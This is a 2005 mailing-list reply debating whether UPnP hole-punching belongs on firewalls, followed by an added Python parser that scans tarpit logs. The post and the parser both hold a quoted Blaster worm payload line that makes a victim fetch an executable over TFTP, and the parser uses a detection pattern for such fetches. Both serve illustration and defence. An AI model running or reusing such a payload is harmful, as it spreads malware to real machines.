Firewall Wizards mailing list archives

Re: Is NAT in OpenBSD PF UPnP enabled or Non UPnP?


From: Chuck Swiger <chuck () codefab com>
Date: Wed, 1 Jun 2005 15:36:37 -0400

On Jun 1, 2005, at 5:01 AM, Darren Reed wrote:
An odd set of comments to make.  I understand why UPnP is useful, and
it is a fine thing for your LAN at home or maybe a tiny business
which can't afford anyone to actually manage the network, but the
people on this list ought to have some concern about security, too.

Not really an odd set of comments, go ask on an openbsd or pf mailing
list if someone has developed a UPnP server yet and see how many abusive
replies you get back about it being insecure, etc.  Luddites.

If you went on an OpenBSD or PF list and started telling people to scrap OpenBSD and install Linux instead because iptables has UPnP, color me unsurprised that you'd get abusive replies.

I don't see how permitting arbitrary services to go through can be a
good idea from that standpoint, any more than permitting arbitrary
RPC through is a good idea....

Do you let ssh through a firewall?

Yes.

If you let that through, with tunnelling, you may as well be letting
through arbitrary services.

Um, no, this argument is bogus. The potential risks from letting arbitrary services through and the risks of permitting SSH access are not similar, much less identical.

If you're letting HTTP through a firewall, you're letting RPC through
(remember SOAP?)

Yes, and XML-RPC, and lots of other flavors, too. But then, one can hide a covert data channel over pretty much anything (using steganography with images, etc).

You shouldn't permit inbound HTTP to any box, just to machines which actually are intended to run an HTTP server. You shouldn't enable WebDAV and SOAP and other fancy bits unless you need them. And you hopefully shouldn't permit arbitrary outbound HTTP, either: forward those via a proxy server.

To the OP: why are you trying to do UPnP through a firewall?  Why
can't you put the devices which are permitted/expected to talk to
each other with that kind of freedom on the same subnet?

Ugh.
You make it sound like you really don't understand UPnP or what
he wants to do at all.

You sound like you can't make a point without indulging in personal attacks.

I understand Microsoft's Zeroconf, and Apple's Rendezvous (or Bonjour, now), just fine, both in terms of the multicast DNS service lookup/notifications, the auto-IP backoff strategy for not interfering with a DHCP server, and the mild changes to ARPOP_REQUEST and ARPOP_REPLY to avoid polluting the ARP cache when a node tries to autoconfig itself.

I'm also familiar with hosts poking at port 4444 and trying to do stuff like:

TCP: from IP=210.163.171.101:2968 to tarpit IP=199.103.21.236:4444 S
TCP: from tarpit IP=199.103.21.236:4444 to IP=210.163.171.101:2968 SA
TCP: from IP=210.163.171.101:2968 to tarpit IP=199.103.21.236:4444 PA
TCP data: tftp -i 192.168.0.165 GET enbiei.exe .

Of course, this particular Blaster scan came from a box using a private IP addr behind NAT and would not actually work, but the intent wasn't friendly.

UPnP is a firewall to host protocol/service,
generally NOT something that goes through it.

This much, I'd agree with.

It's most often used by services running on an internal host that want
to have someone connect in, but can't because of NAT.

UPnP is most often used by people who simply connect a printer to their LAN and print to it without manually configuring the network settings. Using UPnP for automatically punching holes through firewalls strikes me as a dangerous idea.

Personally, I'd prefer to be able to configure a UPnP server than just
open random ports, permanently on my firewall, wouldn't you?

No. I'd rather explicitly manage the services which are permitted through the firewall.

Would you rather have a static configuration for bittorrent that always
redirected port 6881-6889 (and had them open, regardless of whether or
not your client was running) or configure a piece of software to open
those ports, as required by the application?

If I cared about the security of the box in question, it wouldn't be running bittorrent or any other flavor of peer-to-peer networking.

People seem to think "oh no, devices can control the firewall and make
it open everything!" - bah, that's just an implementation detail.

Anyway, I could go on but I gotta run...

No doubt.

--
-Chuck
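As an added illustration, not part of the original thread: a small Python parser for the tarpit trace format quoted in the message above. It flags a TFTP fetch command carried in the TCP payload of a session to the tarpit and records whether the named TFTP server is a private address, which is why the scan described above "would not actually work" from outside. The line format is taken from the message; the sample lines are a constructed copy of it.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample, copied from the tarpit trace quoted in the message.
SAMPLE_LOG = """\
TCP: from IP=210.163.171.101:2968 to tarpit IP=199.103.21.236:4444 S
TCP: from tarpit IP=199.103.21.236:4444 to IP=210.163.171.101:2968 SA
TCP: from IP=210.163.171.101:2968 to tarpit IP=199.103.21.236:4444 PA
TCP data: tftp -i 192.168.0.165 GET enbiei.exe .
"""

# "tarpit " marks which side of the packet is our listener.
PKT_RE = re.compile(
    r"^TCP: from (tarpit )?IP=(\S+):(\d+) to (tarpit )?IP=(\S+):(\d+) (\w+)$")
DATA_RE = re.compile(r"^TCP data: (.*)$")
# A tftp client invocation that pulls a file from some server address.
TFTP_RE = re.compile(r"\btftp\b.*?(\d+\.\d+\.\d+\.\d+).*?\bGET\b\s+(\S+)",
                     re.IGNORECASE)


@dataclass
class Finding:
    client: str            # remote host that sent the payload
    tarpit_port: int       # listener port it connected to
    tftp_server: str       # address the payload tells the victim to fetch from
    filename: str          # file requested over TFTP
    server_is_private: bool  # RFC1918 server: unreachable from outside NAT
    handshake_complete: bool  # S, SA and PA all seen before the payload


def analyze(log_text):
    findings = []
    client = port = None
    flags_seen = set()
    for line in log_text.splitlines():
        m = PKT_RE.match(line)
        if m:
            _, src, _, to_tarpit, _, dport, flags = m.groups()
            if to_tarpit:                   # inbound packet: remember the peer
                if src != client:
                    flags_seen = set()
                client, port = src, int(dport)
            flags_seen.add(flags)
            continue
        m = DATA_RE.match(line)
        if m and client:
            t = TFTP_RE.search(m.group(1))
            if t:
                server, fname = t.groups()
                findings.append(Finding(
                    client, port, server, fname,
                    ipaddress.ip_address(server).is_private,
                    {"S", "SA", "PA"} <= flags_seen))
    return findings
```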
